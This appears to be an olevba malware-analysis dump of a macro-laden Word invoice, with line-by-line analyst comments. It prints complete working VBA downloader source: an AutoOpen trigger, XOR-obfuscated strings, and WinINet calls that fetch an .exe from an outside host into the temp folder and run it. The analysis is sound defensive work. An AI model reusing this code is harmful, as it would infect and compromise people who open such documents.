- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- inv_30~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: inv_30~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub VICTOR(MARTIN As Long) ' Pass-through hop in the start-up chain; the MARTIN argument is never read.
- JEREMY ' Hands control to JEREMY (module PIDLE0).
- End Sub
- Sub autoopen() ' Auto-exec entry point: Word runs this when the document is opened (the AutoExec/AutoOpen hit in the ANALYSIS table).
- VICTOR 544 ' 544 is discarded by VICTOR; the call only starts the chain VICTOR -> JEREMY -> ROY -> BENJAMIN -> VINCENT.
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO OIDL8.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/OIDL8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function JEFFERY() As Object ' Returns a COM object whose ProgID exists only in encoded form in the macro.
- Dim LAWRENCE As String
- LAWRENCE = ALBERT(EDDIE, EDWIN) ' XOR-decodes hex constant EDWIN with key EDDIE; worked by hand this gives "Scripting.FileSystemObject" (re-check with a decoder).
- Set JEFFERY = CreateObject(LAWRENCE) ' Late-bound creation from the decoded string, so the ProgID never appears as a literal for static scanners.
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function JEFF(ByRef NICHOLAS As Object) As Object ' Folder lookup on the object passed in; VINCENT passes JEFFERY's result.
- Set JEFF = NICHOLAS.GetSpecialFolder(2) ' On a FileSystemObject, 2 is TemporaryFolder, i.e. the user's temp directory.
- End Function
- Sub ROY(CALEIGH As Long) ' Pass-through hop; CALEIGH is never read.
- BENJAMIN ("BRUCE") ' "BRUCE" is a throwaway argument that BENJAMIN does not use.
- End Sub
- Public Function BENJAMIN(VINCENTs As String) ' Ignores its argument; the parameter name VINCENTs only resembles the procedure VINCENT.
- VINCENT ' Calls the payload routine VINCENT (module IDL4).
- End Function
- Public Function ALBERT(BRANDON As String, ADAM As String) As String ' String decoder: BRANDON is the key, ADAM the hex-encoded ciphertext; returns the XOR-decoded text.
- Dim TONY As Integer
- Dim LUIS As Integer
- Dim WAYNE As Double
- For WAYNE = 42 To 43 ' Junk loop: WAYNE never equals 32, so the End below is unreachable.
- If WAYNE = 32 Then End
- Next WAYNE
- Dim BILLY As Long
- Dim STEVE As String
- For BILLY = 1 _
- To _
- ( _
- ANTONIO _
- (ADAM) _
- / 2) ' One iteration per hex pair: ANTONIO is Len, so the bound is Len(ADAM) / 2.
- TONY = CHRIS(ADAM, BILLY) ' Numeric value of the BILLY-th two-digit hex pair of ADAM.
- LUIS = EARL(BRANDON, BILLY) ' Character code of the key at position (BILLY Mod Len(key)) + 1.
- STEVE = STEVE + PHILIP(TONY, LUIS) ' PHILIP is Chr(TONY Xor LUIS); append the decoded character.
- Next BILLY
- ALBERT = STEVE
- End Function
- Sub JEREMY() ' Hop in the start-up chain between VICTOR and ROY; does no work of its own.
- Dim AARON As Long ' Declared but never used.
- Dim RANDY As Integer
- For RANDY = 414 To 416 ' Junk loop: RANDY never equals 1312, so End is unreachable.
- If RANDY = 1312 Then End
- Next RANDY
- ROY (5) ' The 5 is discarded by ROY.
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function EARL(ByRef BRANDON As String, ByRef BILLY As Long) As Integer ' Key byte for output position BILLY in ALBERT's XOR decoding.
- EARL = Asc(JIMMY(BRANDON, _
- ((BILLY Mod ANTONIO(BRANDON)) + 1), 1)) ' JIMMY is Mid$ and ANTONIO is Len: index (BILLY Mod Len(key)) + 1, so the key is consumed from its second character and wraps around.
- End Function
- Public Function VINCENT() ' Payload routine: builds a path in the temp folder, has DALE download a file to it, then opens that file.
- Dim MELVIN As Object
- Dim JESUS As Integer
- For JESUS = 84 To 85 ' Junk loop (the counter is pushed past the bound); the three other For JESUS loops below are the same filler.
- JESUS = JESUS + 15
- Next JESUS
- Dim GLENN As Object
- For JESUS = 70 To 71
- JESUS = JESUS + 5
- Next JESUS
- Set GLENN _
- = JEFFERY() ' GLENN: object created by JEFFERY from a decoded ProgID (by hand: "Scripting.FileSystemObject").
- For JESUS = 72 To 73
- JESUS = JESUS + 8
- Next JESUS
- Set MELVIN = JEFF(JEFFERY) ' MELVIN: GetSpecialFolder(2), the temp folder, taken from a second JEFFERY object.
- Dim CHAD
- Dim JACOB
- JACOB = EUGENE(1024, EDDIE, FREDERICK) ' EUGENE ignores 1024 and XOR-decodes FREDERICK with key EDDIE; by hand this gives "\rizob1.0.exe" (verify with a decoder).
- For JESUS = 92 To 93
- JESUS = JESUS + 9
- Next JESUS
- CHAD = MELVIN & JACOB ' Drop path: the folder object concatenated as a string (presumably its path) plus the decoded file name.
- If FRANCIS(GLENN, CHAD) Then ' FRANCIS wraps FileExists: remove any earlier copy before downloading.
- GLENN. _
- DeleteFile CHAD
- End If
- If DALE(CHAD) Then ' DALE performs the download to CHAD; its Boolean result is ignored (empty If).
- End If
- If FRANCIS(GLENN, CHAD) Then ' Existence re-check whose result is also ignored.
- End If
- Dim RALPH
- Set RALPH = CreateObject _
- (ALBERT _
- (EDDIE, HERBERT)) ' ProgID decoded from HERBERT (by hand: "Shell.Application").
- RALPH.Open CHAD ' Opens the dropped file through the shell object; this method call is the only "Open" in this module, so olevba's "May open a file" hit here is really the launch step.
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Const HERBERT = "122F222E3B77142635223E2A29352E282C" ' Hex ciphertext; XOR with EDDIE gives (decoded by hand, verify) "Shell.Application". Used by VINCENT to open the dropped file.
- Public Const FREDERICK = "1D352E38383B6478756032312D" ' Decodes (by hand, verify) to "\rizob1.0.exe": the file name VINCENT appends to the temp folder.
- Public Const JOEL = "293333326D767A3721223E3D213124222C3623307826213A667B74746874626D7B333D2B" ' Decodes (by hand, verify) to the download URL, defanged: hxxp://adlitipcenaze[.]com/353/654[.]exe. Passed to InternetOpenUrlA in ANDREW.
- Public Const EDWIN = "1224352B272D3C38226011202424143E31233C38192724322A3C" ' Decodes (by hand, verify) to "Scripting.FileSystemObject". Used by JEFFERY.
- Public Const EDDIE = "HAGGBWYUVENWI" ' XOR key for the four hex constants above; EARL indexes it from the second character and wraps.
- Public Const JAMES = "JOHN" ' Not referenced anywhere in the dumped macros; looks like filler.
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- ROBERT Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long ' ROBERT = InternetCloseHandle. This branch holds the 64-bit (PtrSafe/LongPtr) forms of four WinINet imports; the #Else branch repeats them for 32-bit Office.
- Public _
- Declare _
- PtrSafe _
- Function _
- MICHAEL Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr ' MICHAEL = InternetOpenA: starts a WinINet session (called from VINNIPUH).
- Public _
- Declare _
- PtrSafe _
- Function _
- WILLIAM Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer ' WILLIAM = InternetReadFile: reads response bytes into MARK; GEORGE (ByRef by default) receives the byte count.
- Public _
- Declare _
- PtrSafe _
- Function _
- DAVID Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr ' DAVID = InternetOpenUrlA: requests a URL on the session (called from ANDREW).
- #Else
- Public Declare Function ROBERT Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long ' 32-bit form of ROBERT.
- Public Declare Function MICHAEL Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long ' 32-bit form of MICHAEL.
- Public Declare Function WILLIAM Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer ' 32-bit form of WILLIAM.
- Public Declare Function DAVID Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long ' 32-bit form of DAVID. The aliases keep the API names out of every call site; only these Declare lines (and the wininet.dll IOC) reveal them.
- #End If
- Private Const MANUEL = 8162 ' Size of the read buffer MARK and the byte count requested per InternetReadFile call in DALE.
- Private Const RODNEY As String = "CURTIS" ' First (agent) argument of InternetOpenA in VINNIPUH, so requests should carry "CURTIS" as the User-Agent: a candidate network indicator.
- Private Const NORMAN = 1 ' Access-type argument of InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT (no proxy).
- Private Const ALLEN = &H4000000 ' Flags argument of InternetOpenUrlA in ANDREW; 0x04000000 is INTERNET_FLAG_DONT_CACHE.
- Public Function DALE _
- (ByVal MARVIN As String) As Boolean ' Downloader: fetches the URL that ANDREW decodes and writes the response to the path MARVIN; True when a non-zero amount of data was collected.
- #If VBA7 _
- And Win64 Then
- Dim LEONARD As LongPtr, STANLEY As LongPtr
- #Else
- Dim LEONARD As Long, STANLEY As Long
- #End If
- Dim FRANK As Long
- Dim MARK As String * MANUEL, CHARLES As String
- Dim MIKE As Integer, NATHAN As Double
- LEONARD = VINNIPUH ' Session handle from InternetOpenA.
- If LEONARD = 0 Then ' No session: leave with the default False before any request or file write.
- Exit Function
- End If
- Dim STEPHEN As Boolean ' Declared but never used.
- If ANDREW(STANLEY, LEONARD) Then ' ANDREW stores the InternetOpenUrlA handle in STANLEY (ByRef) and always returns True, hence the empty If.
- End If
- If STANLEY = 0 Then ' Request handle is null: nothing to read.
- NATHAN = 0
- Else
- WILLIAM STANLEY, MARK, MANUEL, FRANK ' First InternetReadFile: up to MANUEL bytes into the fixed-length buffer MARK; FRANK = bytes read.
- CHARLES = MARK ' Copies the whole fixed-length buffer rather than the first FRANK characters, so a short first read leaves padding in the output.
- Dim RAYMOND As Long
- For RAYMOND = 321 To 322 ' Junk loop: RAYMOND never equals 1232.
- If RAYMOND = 1232 Then End
- Next RAYMOND
- Do While FRANK <> 0 ' Keep reading until a call reports zero bytes.
- WILLIAM STANLEY, MARK, MANUEL, FRANK
- CHARLES = CHARLES + Mid(MARK, 1, FRANK) ' Later chunks are trimmed to the bytes actually read.
- Loop
- NATHAN = ANTONIO(CHARLES): _
- MIKE = DANNY("JERRY") ' NATHAN = length collected (ANTONIO is Len); MIKE = free file number (DANNY returns FreeFile and ignores "JERRY").
- Open MARVIN _
- For Binary Access Write _
- Lock Write _
- As #MIKE ' Raw binary write to the target path: the source of the Open/Binary/Write hits for this module.
- Put #MIKE, _
- , CHARLES ' Writes the collected data in a single Put.
- Dim DENNIS As Double
- For DENNIS = 42 To 43 ' Junk loop: DENNIS never equals 437.
- If DENNIS = 437 Then End
- Next DENNIS
- Close #MIKE
- End If
- ROBERT STANLEY ' InternetCloseHandle on the request handle, then on the session handle.
- ROBERT LEONARD
- CHARLES = ""
- If NATHAN Then ' Success means "non-zero length" only; nothing here checks the HTTP status or the content.
- DALE = True
- End If
- End Function
- Public Function PHILIP(ByRef TONY As Integer, ByRef LUIS As Integer) As String ' One decoded character for ALBERT: ciphertext value TONY XOR key value LUIS.
- PHILIP = Chr(TONY Xor LUIS) ' The Chr and Xor hits in the ANALYSIS table come from this line.
- End Function
- Public Function CHRIS(ByRef ADAM As String, ByRef BILLY As Long) As Integer ' Numeric value of hex pair number BILLY in the string ADAM.
- CHRIS = Val("&H" & (JIMMY(ADAM, JOHNNY(BILLY), 2))) ' JIMMY is Mid$: two characters starting at 2*BILLY-1, parsed as hex by Val("&H..").
- End Function
- Public Function JOHNNY(ByRef BILLY As Long) As Long ' 1-based start offset of hex pair number BILLY.
- JOHNNY = (2 * BILLY) - 1 ' Pair 1 starts at character 1, pair 2 at character 3, and so on.
- End Function
- Public Function JIMMY(ByRef BRYAN As String, ByRef TONY As Integer, ByRef LUIS As Integer) As String ' Renamed wrapper for Mid$ (string, start, length); keeps the built-in name out of the decoder's call sites.
- JIMMY = Mid$(BRYAN, TONY, LUIS)
- End Function
- Public Function ANTONIO(BRYAN As String) As Long ' Renamed wrapper for Len.
- ANTONIO = Len(BRYAN)
- End Function
- Public Function DANNY(BRYAN As String) As Integer ' Returns the next free file number; the BRYAN argument is never used.
- DANNY = FreeFile
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL3.bas
- in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function FRANCIS(ByRef RYAN As Object, ByVal ROGER As String) As Boolean ' True when the path ROGER exists; VINCENT passes the object from JEFFERY as RYAN.
- If RYAN.FileExists(ROGER) Then ' Plain existence test, spelled out as an If/Else instead of a direct assignment.
- FRANCIS = True
- Else
- FRANCIS = False
- End If
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function ANDREW(ByRef JOE As LongPtr, JUAN As LongPtr) As Boolean ' Opens the download URL on session JUAN and hands the request handle back through JOE (64-bit signature).
- #Else
- Public Function ANDREW(ByRef JOE As Long, JUAN As Long) As Boolean ' Same function, 32-bit signature.
- #End If
- Dim JACK As String
- Dim HOWARD As Long ' Declared but never used.
- JACK _
- = EUGENE(325, EDDIE, JOEL) ' EUGENE ignores 325 and XOR-decodes JOEL with key EDDIE; the result is the URL to fetch.
- JOE _
- = DAVID _
- ( _
- JUAN, _
- JACK, vbNullString, _
- 0, _
- ALLEN, 0) ' InternetOpenUrlA(session, URL, no extra headers, header length 0, flags ALLEN, context 0).
- ANDREW = True ' Always True, even if JOE came back 0; DALE tests the handle itself.
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function VINNIPUH() As LongPtr ' Opens the WinINet session used for the download (64-bit signature).
- #Else
- Public Function VINNIPUH() As Long ' Same function, 32-bit signature.
- #End If
- VINNIPUH = MICHAEL(RODNEY, NORMAN, vbNullString, vbNullString, 0) ' InternetOpenA(agent "CURTIS", access type 1, no proxy name, no bypass list, flags 0); returns 0 on failure, which DALE checks.
- End Function
- Public Function EUGENE(BOBBY As Long, CARLOS As String, RUSSELL As String) As String ' Wrapper over the decoder ALBERT(key, hex text); BOBBY is never used, so the numbers at call sites (1024, 325) are decoration.
- EUGENE = ALBERT(CARLOS, RUSSELL)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.